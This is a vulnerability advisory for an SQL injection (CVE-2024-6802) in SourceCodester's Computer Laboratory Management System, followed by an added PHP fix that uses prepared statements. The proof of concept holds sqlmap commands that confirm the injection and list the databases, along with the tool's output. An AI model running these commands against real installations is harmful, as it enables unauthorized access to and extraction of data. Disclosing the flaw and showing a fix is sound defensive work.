CVE-2024-6802

 

Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Computer Laboratory Management System

Affected components: /lms/classes/Master.php?f=save_record

Injection parameter: MULTIPART id

 

POC

1. Intercept the request using Burp Suite Proxy.

2. Save the request to save_record.txt.

The vulnerability can be verified with the following command:

sqlmap -r save_record.txt --batch

Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"


Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"


Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"

Databases can be dumped using the following command:

sqlmap -r save_record.txt --batch --dbs

[02:45:07] [INFO] fetching database names
[02:45:07] [INFO] retrieved: 'information_schema'
[02:45:07] [INFO] retrieved: 'lms'
available databases [2]:
[*] information_schema
[*] lms
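
Mitigation sketch (an added example, not code from the product or from this advisory): a save handler that validates the multipart id field as an integer, binds all values through mysqli prepared statements, and keeps database error text out of the response, which removes the error-based channel listed above. The table name record_list, the columns name and remarks, and the function signature are hypothetical placeholders.

```php
<?php
// Added example. Table/column names below are hypothetical placeholders.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

const ALLOWED_COLUMNS = ['name', 'remarks']; // assumed column allow-list

function save_record(mysqli $db, array $post): array
{
    // The "id" form field is untrusted: accept only empty (insert) or a positive integer.
    $rawId = $post['id'] ?? '';
    $id = null;
    if ($rawId !== '') {
        $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false) {
            return ['status' => 'failed', 'msg' => 'Invalid id'];
        }
    }

    // Identifiers cannot be bound, so only allow-listed string fields reach the SQL text.
    $cols = array_values(array_filter(
        ALLOWED_COLUMNS,
        fn($c) => isset($post[$c]) && is_string($post[$c])
    ));
    if ($cols === []) {
        return ['status' => 'failed', 'msg' => 'No fields to save'];
    }
    $values = array_map(fn($c) => $post[$c], $cols);
    $types = str_repeat('s', count($cols));

    if ($id === null) {
        $sql = 'INSERT INTO `record_list` (`' . implode('`, `', $cols) . '`) VALUES ('
             . implode(', ', array_fill(0, count($cols), '?')) . ')';
    } else {
        $sql = 'UPDATE `record_list` SET '
             . implode(', ', array_map(fn($c) => "`$c` = ?", $cols))
             . ' WHERE `id` = ?';
        $types .= 'i';      // id is bound as an integer, never concatenated
        $values[] = $id;
    }

    try {
        $stmt = $db->prepare($sql);
        $stmt->bind_param($types, ...$values);
        $stmt->execute();
        return ['status' => 'success'];
    } catch (mysqli_sql_exception $e) {
        error_log('save_record failed: ' . $e->getMessage()); // detail stays server-side
        return ['status' => 'failed', 'msg' => 'Unable to save record'];
    }
}
```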